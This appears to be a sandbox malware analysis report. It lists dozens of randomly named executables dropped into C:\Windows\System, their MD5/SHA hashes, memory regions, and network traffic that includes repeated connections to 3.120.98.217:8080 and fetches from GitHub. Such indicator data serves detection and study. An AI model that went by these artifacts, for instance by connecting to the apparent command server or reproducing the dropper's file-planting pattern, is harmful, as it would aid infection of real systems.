C:\Windows\System\aaeafif.exe

C:\Windows\System\aaeafif.exe

C:\Windows\System\wfPsJlR.exe

C:\Windows\System\wfPsJlR.exe

C:\Windows\System\fzwdSIY.exe

C:\Windows\System\fzwdSIY.exe

C:\Windows\System\szjKtrT.exe

C:\Windows\System\szjKtrT.exe

C:\Windows\System\zIMNDgG.exe

C:\Windows\System\zIMNDgG.exe

C:\Windows\System\YuLuscV.exe

C:\Windows\System\YuLuscV.exe

C:\Windows\System\GgJjFGU.exe

C:\Windows\System\GgJjFGU.exe

C:\Windows\System\ANeJOTa.exe

C:\Windows\System\ANeJOTa.exe

C:\Windows\System\gCoWiwI.exe

C:\Windows\System\gCoWiwI.exe

C:\Windows\System\pMRPIqS.exe

C:\Windows\System\pMRPIqS.exe

C:\Windows\System\lSenEcf.exe

C:\Windows\System\lSenEcf.exe

C:\Windows\System\cHsQSJq.exe

C:\Windows\System\cHsQSJq.exe

C:\Windows\System\vzuGhEN.exe

C:\Windows\System\vzuGhEN.exe

C:\Windows\System\XVhitTr.exe

C:\Windows\System\XVhitTr.exe

C:\Windows\System\PHOiagB.exe

C:\Windows\System\PHOiagB.exe

C:\Windows\System\AxWLYKk.exe

C:\Windows\System\AxWLYKk.exe

C:\Windows\System\tXqTuGr.exe

C:\Windows\System\tXqTuGr.exe

C:\Windows\System\ExxUlbu.exe

C:\Windows\System\ExxUlbu.exe

C:\Windows\System\dIOvZlm.exe

C:\Windows\System\dIOvZlm.exe

C:\Windows\System\mstZMop.exe

C:\Windows\System\mstZMop.exe

C:\Windows\System\sfPtZrg.exe

C:\Windows\System\sfPtZrg.exe

C:\Windows\System\goIQsWt.exe

C:\Windows\System\goIQsWt.exe

C:\Windows\System\EnLflUL.exe

C:\Windows\System\EnLflUL.exe

C:\Windows\System\DwLSsbl.exe

C:\Windows\System\DwLSsbl.exe

C:\Windows\System\aBCUWBb.exe

C:\Windows\System\aBCUWBb.exe

C:\Windows\System\SatWFqN.exe

C:\Windows\System\SatWFqN.exe

C:\Windows\System\fqaGbjd.exe

C:\Windows\System\fqaGbjd.exe

C:\Windows\System\dpCiAKS.exe

C:\Windows\System\dpCiAKS.exe

C:\Windows\System\VbJMohB.exe

C:\Windows\System\VbJMohB.exe

C:\Windows\System\FvGcDYQ.exe

C:\Windows\System\FvGcDYQ.exe

C:\Windows\System\qfFQwhO.exe

C:\Windows\System\qfFQwhO.exe

C:\Windows\System\DTtcngq.exe

C:\Windows\System\DTtcngq.exe

C:\Windows\System\OvnfegA.exe

C:\Windows\System\OvnfegA.exe

C:\Windows\System\gfSgevd.exe

C:\Windows\System\gfSgevd.exe

C:\Windows\System\SsRDXJF.exe

C:\Windows\System\SsRDXJF.exe

C:\Windows\System\oSatAMF.exe

C:\Windows\System\oSatAMF.exe

C:\Windows\System\HXhFLjb.exe

C:\Windows\System\HXhFLjb.exe

C:\Windows\System\ZZjHuQP.exe

C:\Windows\System\ZZjHuQP.exe

C:\Windows\System\faKaXJP.exe

C:\Windows\System\faKaXJP.exe

C:\Windows\System\eaIRXXR.exe

C:\Windows\System\eaIRXXR.exe

C:\Windows\System\pMkFoPv.exe

C:\Windows\System\pMkFoPv.exe

C:\Windows\System\TZGnKdN.exe

C:\Windows\System\TZGnKdN.exe

C:\Windows\System\fOMiyTs.exe

C:\Windows\System\fOMiyTs.exe

C:\Windows\System\LIKbtRD.exe

C:\Windows\System\LIKbtRD.exe

C:\Windows\System\ujyKhqG.exe

C:\Windows\System\ujyKhqG.exe

C:\Windows\System\fEjjTlt.exe

C:\Windows\System\fEjjTlt.exe

C:\Windows\System\VGbGkBo.exe

C:\Windows\System\VGbGkBo.exe

C:\Windows\System\fPQFkmq.exe

C:\Windows\System\fPQFkmq.exe

C:\Windows\System\RyxIgEL.exe

C:\Windows\System\RyxIgEL.exe

C:\Windows\System\gZdIhSV.exe

C:\Windows\System\gZdIhSV.exe

C:\Windows\System\dynZLhY.exe

C:\Windows\System\dynZLhY.exe

C:\Windows\System\otwzMAk.exe

C:\Windows\System\otwzMAk.exe

C:\Windows\System\JgjNGoR.exe

C:\Windows\System\JgjNGoR.exe

C:\Windows\System\BuZuuPL.exe

C:\Windows\System\BuZuuPL.exe

C:\Windows\System\MqQPAuP.exe

C:\Windows\System\MqQPAuP.exe

C:\Windows\System\faDvGfP.exe

C:\Windows\System\faDvGfP.exe

C:\Windows\System\TZqqovQ.exe

C:\Windows\System\TZqqovQ.exe

C:\Windows\System\NhYBUiF.exe

C:\Windows\System\NhYBUiF.exe

C:\Windows\System\faVbNMo.exe

C:\Windows\System\faVbNMo.exe

C:\Windows\System\zlIxkgh.exe

C:\Windows\System\zlIxkgh.exe

C:\Windows\System\lYDAoOB.exe

C:\Windows\System\lYDAoOB.exe

C:\Windows\System\wyPDEix.exe

C:\Windows\System\wyPDEix.exe

C:\Windows\System\uHktmxg.exe

C:\Windows\System\uHktmxg.exe

C:\Windows\System\eXKDyCl.exe

C:\Windows\System\eXKDyCl.exe

C:\Windows\System\MjgQSmw.exe

C:\Windows\System\MjgQSmw.exe

C:\Windows\System\kpifpbe.exe

C:\Windows\System\kpifpbe.exe

C:\Windows\System\lAbuCBG.exe

C:\Windows\System\lAbuCBG.exe

C:\Windows\System\tlRevVt.exe

C:\Windows\System\tlRevVt.exe

C:\Windows\System\hrzIIFQ.exe

C:\Windows\System\hrzIIFQ.exe

C:\Windows\System\tFiVZqR.exe

C:\Windows\System\tFiVZqR.exe

C:\Windows\System\PmlZlrB.exe

C:\Windows\System\PmlZlrB.exe

C:\Windows\System\JUKBAlj.exe

C:\Windows\System\JUKBAlj.exe

C:\Windows\System\vJAOpok.exe

C:\Windows\System\vJAOpok.exe

C:\Windows\System\PaUIwOg.exe

C:\Windows\System\PaUIwOg.exe

C:\Windows\System\NjIapDm.exe

C:\Windows\System\NjIapDm.exe

C:\Windows\System\FNVkgtM.exe

C:\Windows\System\FNVkgtM.exe

C:\Windows\System\DcVHoZN.exe

C:\Windows\System\DcVHoZN.exe

C:\Windows\System\xyaYfUK.exe

C:\Windows\System\xyaYfUK.exe

C:\Windows\System\zvVtHpu.exe

C:\Windows\System\zvVtHpu.exe

C:\Windows\System\UvfzciS.exe

C:\Windows\System\UvfzciS.exe

C:\Windows\System\gmzccYx.exe

C:\Windows\System\gmzccYx.exe

C:\Windows\System\acEVNKa.exe

C:\Windows\System\acEVNKa.exe

C:\Windows\System\XRbXDfc.exe

C:\Windows\System\XRbXDfc.exe

C:\Windows\System\tjYoPLb.exe

C:\Windows\System\tjYoPLb.exe

C:\Windows\System\LFpSvln.exe

C:\Windows\System\LFpSvln.exe

C:\Windows\System\wyVcvPM.exe

C:\Windows\System\wyVcvPM.exe

C:\Windows\System\ZcgsWfd.exe

C:\Windows\System\ZcgsWfd.exe

C:\Windows\System\mBMZtYR.exe

C:\Windows\System\mBMZtYR.exe

C:\Windows\System\AlISbeQ.exe

C:\Windows\System\AlISbeQ.exe

C:\Windows\System\QwrAKri.exe

C:\Windows\System\QwrAKri.exe

C:\Windows\System\xAYnDZW.exe

C:\Windows\System\xAYnDZW.exe

C:\Windows\System\dlIgPBZ.exe

C:\Windows\System\dlIgPBZ.exe

C:\Windows\System\JfGYyCm.exe

C:\Windows\System\JfGYyCm.exe

C:\Windows\System\tjTGdFp.exe

C:\Windows\System\tjTGdFp.exe

C:\Windows\System\Lyyjgig.exe

C:\Windows\System\Lyyjgig.exe

C:\Windows\System\BdyZkhY.exe

C:\Windows\System\BdyZkhY.exe

C:\Windows\System\ktJJenm.exe

C:\Windows\System\ktJJenm.exe

C:\Windows\System\vxLNduu.exe

C:\Windows\System\vxLNduu.exe

C:\Windows\System\OwODVSS.exe

C:\Windows\System\OwODVSS.exe

C:\Windows\System\QwrQebv.exe

C:\Windows\System\QwrQebv.exe

C:\Windows\System\ZnRWugb.exe

C:\Windows\System\ZnRWugb.exe

C:\Windows\System\FJLWwEo.exe

C:\Windows\System\FJLWwEo.exe

C:\Windows\System\lQwdfKe.exe

C:\Windows\System\lQwdfKe.exe

C:\Windows\System\UvnrHOq.exe

C:\Windows\System\UvnrHOq.exe

C:\Windows\System\xvinSXm.exe

C:\Windows\System\xvinSXm.exe

C:\Windows\System\pYilwhS.exe

C:\Windows\System\pYilwhS.exe

C:\Windows\System\bovMPZl.exe

C:\Windows\System\bovMPZl.exe

C:\Windows\System\RQorsQU.exe

C:\Windows\System\RQorsQU.exe

C:\Windows\System\QAItbZu.exe

C:\Windows\System\QAItbZu.exe

C:\Windows\System\GQzPLfn.exe

C:\Windows\System\GQzPLfn.exe

C:\Windows\System\xXxPxQJ.exe

C:\Windows\System\xXxPxQJ.exe

C:\Windows\System\vmRtjpt.exe

C:\Windows\System\vmRtjpt.exe

C:\Windows\System\XKitLQv.exe

C:\Windows\System\XKitLQv.exe

C:\Windows\System\hEzAJXt.exe

C:\Windows\System\hEzAJXt.exe

C:\Windows\System\dPuLnXG.exe

C:\Windows\System\dPuLnXG.exe

C:\Windows\System\SgdcnVa.exe

C:\Windows\System\SgdcnVa.exe

C:\Windows\System\YBqLyFj.exe

C:\Windows\System\YBqLyFj.exe

C:\Windows\System\gKRuVXA.exe

C:\Windows\System\gKRuVXA.exe

C:\Windows\System\ltDpyhn.exe

C:\Windows\System\ltDpyhn.exe

C:\Windows\System\AeiwGRW.exe

C:\Windows\System\AeiwGRW.exe

C:\Windows\System\jQOqAJv.exe

C:\Windows\System\jQOqAJv.exe

C:\Windows\System\YNsISmE.exe

C:\Windows\System\YNsISmE.exe

C:\Windows\System\sVPgioO.exe

C:\Windows\System\sVPgioO.exe

C:\Windows\System\ggHoRCy.exe

C:\Windows\System\ggHoRCy.exe

C:\Windows\System\XIkcGVS.exe

C:\Windows\System\XIkcGVS.exe

C:\Windows\System\RRGjknC.exe

C:\Windows\System\RRGjknC.exe

C:\Windows\System\NToCCsS.exe

C:\Windows\System\NToCCsS.exe

C:\Windows\System\UXQQjdb.exe

C:\Windows\System\UXQQjdb.exe

C:\Windows\System\NLShfCn.exe

C:\Windows\System\NLShfCn.exe

C:\Windows\System\Njmrwsz.exe

C:\Windows\System\Njmrwsz.exe

C:\Windows\System\KvWkOvy.exe

C:\Windows\System\KvWkOvy.exe

C:\Windows\System\fLRkVFY.exe

C:\Windows\System\fLRkVFY.exe

C:\Windows\System\HRPyhwR.exe

C:\Windows\System\HRPyhwR.exe

C:\Windows\System\NKJIsXr.exe

C:\Windows\System\NKJIsXr.exe

C:\Windows\System\NOrgPLW.exe

C:\Windows\System\NOrgPLW.exe

C:\Windows\System\ZlzwGIi.exe

C:\Windows\System\ZlzwGIi.exe

C:\Windows\System\pubiqVa.exe

C:\Windows\System\pubiqVa.exe

C:\Windows\System\lglngVv.exe

C:\Windows\System\lglngVv.exe

C:\Windows\System\JqnMAPE.exe

C:\Windows\System\JqnMAPE.exe

C:\Windows\System\vQUIZkj.exe

C:\Windows\System\vQUIZkj.exe

C:\Windows\System\rRbFuiU.exe

C:\Windows\System\rRbFuiU.exe

C:\Windows\System\lNMKdWT.exe

C:\Windows\System\lNMKdWT.exe

C:\Windows\System\tgOYspz.exe

C:\Windows\System\tgOYspz.exe

C:\Windows\System\LADugTf.exe

C:\Windows\System\LADugTf.exe

C:\Windows\System\ePUokKN.exe

C:\Windows\System\ePUokKN.exe

C:\Windows\System\FgFYBpS.exe

C:\Windows\System\FgFYBpS.exe

C:\Windows\System\TJQqOpt.exe

C:\Windows\System\TJQqOpt.exe

C:\Windows\System\WPYwRdx.exe

C:\Windows\System\WPYwRdx.exe

C:\Windows\System\XMhhbdT.exe

C:\Windows\System\XMhhbdT.exe

C:\Windows\System\ybdsnpK.exe

C:\Windows\System\ybdsnpK.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
DE 3.120.98.217:8080 tcp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 52.167.17.97:443 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 udp

Files

memory/4416-0-0x00007FF6970D0000-0x00007FF6974C6000-memory.dmp

memory/4416-1-0x00000234A5990000-0x00000234A59A0000-memory.dmp

C:\Windows\System\uaucjTS.exe

MD5 4aa2a7a876557d77bd4dbd37a79e65e8
SHA1 851a3fa7a37ea79ca8d3b71cf5e233848f230166
SHA256 1eb5363e175570d265416ec6785812f72c03e578135151bd013229df79bfffb5
SHA512 4aace2eed641516b17a0ec32605ec1ba3bad5ec688808325cddbfb16d9e04b81d5f43f109fa51a59ff9981805ed1d04c72811e5efc5c6a53489524473cda028c

memory/1448-3-0x00007FF9D5CB3000-0x00007FF9D5CB5000-memory.dmp

memory/3464-9-0x00007FF688850000-0x00007FF688C46000-memory.dmp

C:\Windows\System\DCKYaNf.exe

MD5 11514bf2d94bd2cf1069259f904801af
SHA1 846d5975517b9138aa6dd16de9130ac46974fa2f
SHA256 468a57a3617c475eb58de6c31d3067130457c79837f3c2bd62d74907e236dfaf
SHA512 8f9b6fca0ec8224390b66d85766acce186e2e50793295b1cc6c8f33e5182d8d83d7d1cba4cd07288a38b46640359b3b4147c75b8202ef7be14de82314e7144c7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s5clk545.qig.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1448-24-0x000002256E250000-0x000002256E272000-memory.dmp

C:\Windows\System\GXVtWeU.exe

MD5 7a792da79c10759b97c26c95021fd6b5
SHA1 145f809ca858e1148768a12289897d8a893280a9
SHA256 75870a275b9a552bf6eb27326a5132ff540b206d3b62bbd20632eb3c3ca3e6a7
SHA512 9253948905e7f7139011e33b0e7544b8b49abaf00dd58db0ebd61361e3fa789117e7b962142c0b27b25acb0453ba6920b46380422e3b532880be010d32cb00c4

C:\Windows\System\MAcvIvH.exe

MD5 78b25e2ba8c7538488c1da153d571e05
SHA1 ac4a540316c6c6a90859c3d07a14d5ffe503b3d0
SHA256 ae4b88885a37abe5acfcc0692c8ab0d7789c6f3980c0a1218f07cf638e5da500
SHA512 b0efc70f7e3b7fc9b111f21a3649fff075f7a5bcce8f2b945fbe7c9bdceee429738dfd8f7cc9c5936d74f21db7c594cfb50230b272e0a2137067857f0bb940fc

C:\Windows\System\wzZMMtp.exe

MD5 b0d159df19ba19e0083e029d3879bf43
SHA1 579db392c5b1f8510cd26735be6eede4050d4f97
SHA256 a1f96f00006f182396caba73d40fda2b87c8e3cd50cd44a3eaf78e98a04fcb5f
SHA512 97d89e68deb30fcb61e4866eebc65eec2d8b71a7a9c01b74a968302eb8c92d3ff8881a14383f87df67fa6bb62bb4092bc5d0fb311b00c12621930a4550cab6ab

memory/1448-36-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/1448-37-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/2180-38-0x00007FF66EFD0000-0x00007FF66F3C6000-memory.dmp

memory/1448-39-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/4600-40-0x00007FF785070000-0x00007FF785466000-memory.dmp

memory/1456-41-0x00007FF701FC0000-0x00007FF7023B6000-memory.dmp

memory/3212-42-0x00007FF631560000-0x00007FF631956000-memory.dmp

C:\Windows\System\ATScqZF.exe

MD5 e4a4781b0b2071fa05cfdfc92798d097
SHA1 0732aa73efabd81e474d584f933968924841b6b0
SHA256 0192a5791658478b8611150fdf499095af5cd16af154916b78daf6f7a530c9c5
SHA512 4acc39bebbd3c012bb62b94549eaef5c15fc08cdbbd9077a4e5606f60e1ab6c3ee8d0e4d16599356f9084c3986eb0ac38db37e16096bc238ba10e0c5f5798539

memory/3992-52-0x00007FF767DC0000-0x00007FF7681B6000-memory.dmp

C:\Windows\System\QqcgYSi.exe

MD5 a3496dee9e32ef61f882498faff7a66d
SHA1 af662d0943b673670e3621cc92c9519dd1453935
SHA256 84ba09f1583cdd77a511ab7152fe2c97856883459b86a19ff8cc4a33d3ced6ba
SHA512 96b9ecf6e307ad5f3be386764c7e9c906df707cfaa96626dc740583cc9b3e3838b7133299bca12eaabf3f9114ab45809eac62b4239e5c36b86027eae00d2e86a

C:\Windows\System\FrhHKZz.exe

MD5 3c3d5168de92415f9fc4d5512c39f93d
SHA1 ca5bab158ed33bcfb6bb944cf075b78a84ae690e
SHA256 9260b5d51ab1759f0797dbcc08f9aa0b0c7dd95c20706a2feb84525793d658f9
SHA512 9c3e308138a1dfede088a3cc564905e1ce46364676660b22a374ba7316f38f051cf7c64902123cd3988298a455bdf7c9f24eca5d97906868d8da7c08b9359ffa

memory/3020-64-0x00007FF60A720000-0x00007FF60AB16000-memory.dmp

memory/2316-61-0x00007FF634A40000-0x00007FF634E36000-memory.dmp

C:\Windows\System\FHXhFqh.exe

MD5 b95bb87a12a25404f1779f00013265a8
SHA1 652bf17bd5a46ce89c25f8052854227a765757b1
SHA256 d670d3020ff1ef2837aeccd3c8269db272af31f65d05d09ef2b3b482c0fe8385
SHA512 a39b80f254bfc362c62f6cf1d683dd39232e44f5fa6420f12c08313d7a3a2cefcc5fc14cb9e2510367725b561483403abdde38a426f75d418287c1914241841f

C:\Windows\System\Uvxwvvr.exe

MD5 252566a93cfdc4af12e484711ad60a5c
SHA1 eed8df4d72427c98e786c73a39dc7c9140f72219
SHA256 f4f91ba1f22e1e6dce057cc5ed360c7d74fb52708ef5b500434df2a1c23f2dc8
SHA512 a43a0318f38d0a946dd79dc63ed6e9c814156a7da82320ee92e8ed4bd8f3892002520e4e663736cf6194f108affe1b2878770a26333dd9a233865431f9cae769

C:\Windows\System\qjOgzTR.exe

MD5 d6d092975d0e0baf00ad059eb4e2b1a4
SHA1 df355d4e209ac26012b545c8c39bf00486d992a0
SHA256 1881e3c4deac45341125f4126f309aae9c9160f53dffdeb0004cbad7e1bc4b3f
SHA512 d0892ffc1f2e71d622517177e883439538e40057f15c5f51254ab346a3331f1c449826fbefbfb0c2b20ec71709843cf08abc4034152194a422eee6eea3625992

memory/4928-80-0x00007FF759630000-0x00007FF759A26000-memory.dmp

C:\Windows\System\lFjMayh.exe

MD5 bb958d7f839e8d0f444ecfb3aba096c3
SHA1 252ae7272bfa3a2e6d1228a8eaf03f25cd144f00
SHA256 8ca095c164526d3043846ca89a6832222d716b8e3eaae46c4feec0c5a00062f1
SHA512 de2fd7c3c3e82c729aed4eb2f8f01163a90aba61d7b1fa8c6d7759a28c9c2902c0025272f410fb08fde7c4b5a88c1e8cbd75aff3eb3a4cbca1051e424786b7f9

C:\Windows\System\MEGSeyW.exe

MD5 9aa3be930bbcec09335420db44b889e6
SHA1 2b0dca32273c33640e4bb91b6b9add6c80e7f0be
SHA256 2806101da2f65ed900f417fe40d8e3e260a5050b3b2de0b97ab2e540285f8d91
SHA512 19b14b12ed3d5643b7f329b62ef2c3cadd870c6e6afed3050c8094a64c8d2ae014c19ef0880929c654c9b012bd9769f6d5bf8b3bc28fa3b2f3cd82837345213f

memory/4416-93-0x00007FF6970D0000-0x00007FF6974C6000-memory.dmp

C:\Windows\System\oiGeUqL.exe

MD5 8193c1ea4c349ad86c1af380b66f1cb5
SHA1 10809b9bd6617d02af202c1988b8b802f7623830
SHA256 6d7d96f68fa1065c31161232f2ad8c8a1f509da0d8fef73eb09d57febd8518af
SHA512 3e0599f283be0d9e6a64119c5362b9187164119a325fbf4a05af769aaae935302321294db23abada4cefed18548e0a87168204c4bfc36b7ffc2776b75538b291

C:\Windows\System\wUvpkHw.exe

MD5 62b82d58e58f02dc82626a7d2ae451e3
SHA1 e0c84e748e55271fe6fbdbcd7bf5cfbbd1301382
SHA256 5ff081bf0738f1c8636fa08707805a6b7cfa6deca4a0387a3f6a5ab60476b700
SHA512 8a642bdcdd9b0bdff3dbf7d8103e072176cce729674f8e9a23b0ad8b7f8d837defd5b4d763e5cc2f4e120cbd80991bde4d70017dacdd8d82c066ee93852f8940

C:\Windows\System\idfHsFs.exe

MD5 8ae60e212a6fc8961b8d53a949acc9b4
SHA1 39cfc72ce754d153aa36a425d6b121e948d53e0b
SHA256 172a0edf50db6b102766450207b2cbd4a7476e925b97b47cf61580855eed04fd
SHA512 e7d87cec3387d132f46c50bb5383164cb2f48d5f73be9fd934a56d2d6f95bec9d44b98c909c8c4494fcacc6f5aa9a587c1d7bb8f4ab5dcb33ec4450a6474deaf

C:\Windows\System\FzRcZrv.exe

MD5 91574ab40733b1a21bc28b3a33da4a19
SHA1 4d1c1500905f1aa9c45815893945ba4861db309c
SHA256 6d2ab035c7644644b0c5ba94fed6d5c152ebb86235f4b58d06cf4ccde1e6969f
SHA512 d3d5aa1a786eda4a83b7d116b3d95e34774226bf2b957703eb75f821233d76ecab819d24d1a0a167ca740ff85cdbd1304ddb92d197b43b0bd4f5a3405cf26554

C:\Windows\System\ycVugRp.exe

MD5 74da3838ee2243190db3692ff1ed119e
SHA1 dd32888638eb9a7290602924ff537d29e89251c0
SHA256 c0310f13b1ab46236df929cec2a1fc397e7feb8a8e43815f48bb6b14e24e01d8
SHA512 da9fedcdef319ed592a6caa24f412f75446aad43025979254995554fa44711b5149911328f45b600330b6fb3f19f480f6300a9155671636e9945c784df722f65

C:\Windows\System\xELLbtx.exe

MD5 e3c0e6b1374a4616c1faf34595020554
SHA1 cee4f20470b3951171084fd5ea77a98d4d43e678
SHA256 2d7f15c8f6e2a6966999bcf481a178b1c5c4ea92e46f651a5bc30d3c12b51f28
SHA512 5ec115d9a09759ac3852f4e17bcb0f6861880e477c19f7ebff3e85203055318686ecac3e4e4f5401171a8e416d8fd47caa86ad3edc90a5b7a2dd9125c57a9002

C:\Windows\System\GmiDuat.exe

MD5 577410131e4cbb0590bd955204b5b423
SHA1 a9e9eca4f0023e04f8a791c396545d964225ddcf
SHA256 bff902a1993c521d02ddcb40c73db246eb1ee6561d1a0b27ffef4dc6847d25c6
SHA512 3635aeafe25e7748ddc7c2702a2eba20a697a628c925013ff4e8fd085acad133b9be40c87bcf0b5d6222427be3c1657d904015ad6ac16089e3e78831baddda1c

C:\Windows\System\YciXjSs.exe

MD5 d00998f52d93d7e1fe532cf4c7b67e8c
SHA1 a3bb5147467db9a01107b67379837857d78aba89
SHA256 2b88b32563502e94c3789d6f7fa222638b58e049853056503dd18195dc8effb6
SHA512 803d64120ef7df660797e5d9cfd1ec70bb26e6e6d11f7e4095352b4fc0a510987430c813eed6c31146cf911f6da2a6c9c3c15c6f9397489e716cc5665ff12bfd

C:\Windows\System\jKuVWFK.exe

MD5 e0ce9263c5dce9c26bfc3759aac91cc4
SHA1 3faf405d5116ae993cfc97801f6ffc5ce3a28dc9
SHA256 d648977a592c5987443ce90d0ac6e0a13ea0969a8c299a77fe6def24ccff72fc
SHA512 798764c54a44f89d7b6663e5ad81a46d82f1bbc7c1b657965d536a390472712d756e0c5425829e940fc8243e298abd4c831886ceb8211ab23b163e386dcf3806

C:\Windows\System\SqPFEVG.exe

MD5 04f31d38a4542c0796a0a563d54e5e42
SHA1 07ff69c10a014ce783875899d6e3b01de93ec52b
SHA256 576327a88fdadd465edbae6efc62e15198a62dd95b62c87198e59ef47ed52d01
SHA512 3ea09bdd51bc2988928f257f79dfcfd3c92948603ccdb579dd3d25e8fb145af0e134e8de9b382ffcdb8a799062083a8a45fec1d012bf8678a43df86b29d05d5e

memory/2252-267-0x00007FF603D80000-0x00007FF604176000-memory.dmp

memory/5080-277-0x00007FF68D240000-0x00007FF68D636000-memory.dmp

memory/1376-279-0x00007FF75EDF0000-0x00007FF75F1E6000-memory.dmp

memory/4036-282-0x00007FF72FBC0000-0x00007FF72FFB6000-memory.dmp

memory/1932-285-0x00007FF758240000-0x00007FF758636000-memory.dmp

memory/4132-288-0x00007FF6B85B0000-0x00007FF6B89A6000-memory.dmp

memory/3536-292-0x00007FF70F0E0000-0x00007FF70F4D6000-memory.dmp

memory/1448-293-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/1448-291-0x00007FF9D5CB3000-0x00007FF9D5CB5000-memory.dmp

memory/2712-290-0x00007FF65F020000-0x00007FF65F416000-memory.dmp

memory/644-289-0x00007FF694250000-0x00007FF694646000-memory.dmp

memory/3284-287-0x00007FF7CB220000-0x00007FF7CB616000-memory.dmp

memory/2940-286-0x00007FF7F4100000-0x00007FF7F44F6000-memory.dmp

memory/1064-284-0x00007FF780190000-0x00007FF780586000-memory.dmp

memory/3612-283-0x00007FF767B50000-0x00007FF767F46000-memory.dmp

memory/3304-281-0x00007FF6DE090000-0x00007FF6DE486000-memory.dmp

memory/1448-280-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/4908-278-0x00007FF629F40000-0x00007FF62A336000-memory.dmp

C:\Windows\System\VLyPsuC.exe

MD5 ea963357fd99eefa6eed80757c9816d7
SHA1 e42b7f75d553d46fee5abf4b9aa7b9011e6b09bc
SHA256 c4d8980fa7330228b9c53c9001155a888e80386059123bd67f3ce7a1eee6cfd6
SHA512 a6a1d870df17966dd499d00f31b89f0155e27f07335e614ef9d03baeec7895728c4c0addf474e62fdca1700bed19b7594144a5215656ece72c45886ceeb13074

C:\Windows\System\TXTwPtW.exe

MD5 171ed30d67badd084275a9456cdfa039
SHA1 b3c06a9121fb7df987efcee142d6aa69e8b64e51
SHA256 7fb54c314ee9eb1ce6c3a12f3196baf73f4d3e6ccaee612d3976144ea1b8b6fe
SHA512 dc8fa6d3d68a4405ebffcac407ad419d7399a4df05e587097fc6fc6ffc42886040a919017db7099f481d03f5285e6702ebafefe63ac55eb8d086d9eea0bcf4f4

C:\Windows\System\FHpSzWT.exe

MD5 06f36b6c06a5722f740497179e2eab76
SHA1 9fc68fbd9a58171fafffb02276a62622d81544c8
SHA256 762c14c612c14ea3e2ab9781ef95c9916bb7c6869956d1e4a17b1dbf95488ddf
SHA512 2146285950ddca941193db05ccb648738c92021191c78a11bcffe18f653c33b5b7ac5ccc550031f6fe718ae7e03739d9cb65f2322504a12e08e45fa550ea5fd7

C:\Windows\System\vSjEGOY.exe

MD5 28d7f5b8461f5379dd7cc42ca171587f
SHA1 fff1d9578bb6c4838ea84de90a7297446a61ec67
SHA256 862a0a77b01ddacfc8fe1b804fbc05dfecccf36ca69cb36e7493936c9ac24ca3
SHA512 c6a72991e9a7357c3512b47b66c6220cda02b5801d89e70704a7c47a3430d6e82c2143cd881b344f9ca38257b0bf45ed8c05b9b8017e6405e4bf277c9b86ba17

C:\Windows\System\ZmlHwyc.exe

MD5 54d5981a56eab8b8c2d5e06a86e20282
SHA1 5e2544a18dc5421b7e022d548e19d1d76d356b06
SHA256 af9a0073bfcdbe3318fdb90cc33978e6502c5ff4239d1158a3e5596f26d62e0e
SHA512 657565e4519b901fd84ba513bb3893d7eeb960f3b8164afd2fa2c9aea2a2ee7fcb652b92f6d44f3a32e5ecb387568888e55f846b845b190f13815ec1018ef663

memory/3464-463-0x00007FF688850000-0x00007FF688C46000-memory.dmp

C:\Windows\System\EMtlddO.exe

MD5 867902a0c5360d221fcb5f16db9218c5
SHA1 be03aa2e7b58eab83d14b2722057763814f33dcc
SHA256 9750607e39edf296c6baa046dd6a6b899f98e0fb2555d4417b84e88c41d7c655
SHA512 2e9bc4c0767e7879b18de5b0ed9d471a949d3d842364adbcfe89db9cf3263a4478ab038e5aaa49c910debbcf6b2b7394a3f2e5089da81b4eb348b26f8ae362c5

C:\Windows\System\zaxZyxq.exe

MD5 50633754fc89c3e9108f9bcfc6d53a4d
SHA1 1fd019cc99c8d2b49f584dd4fcf9b6f5c7f8c30d
SHA256 7806e004aef7e65b7f1357f2e91ca1b58d3dae03eb244813ba3847f3a51e9754
SHA512 77ff587a17a3deb41746f251342a8d6693e29629eebb79633513b7337374fa954631b773b2e27f27a7cd3bae994f5d6d323decf7e8be3d7ad469e5fa60bc9cf9

memory/4600-643-0x00007FF785070000-0x00007FF785466000-memory.dmp

memory/1456-646-0x00007FF701FC0000-0x00007FF7023B6000-memory.dmp

memory/1448-637-0x00007FF9D5CB0000-0x00007FF9D6771000-memory.dmp

memory/3464-1455-0x00007FF688850000-0x00007FF688C46000-memory.dmp

memory/2180-1458-0x00007FF66EFD0000-0x00007FF66F3C6000-memory.dmp

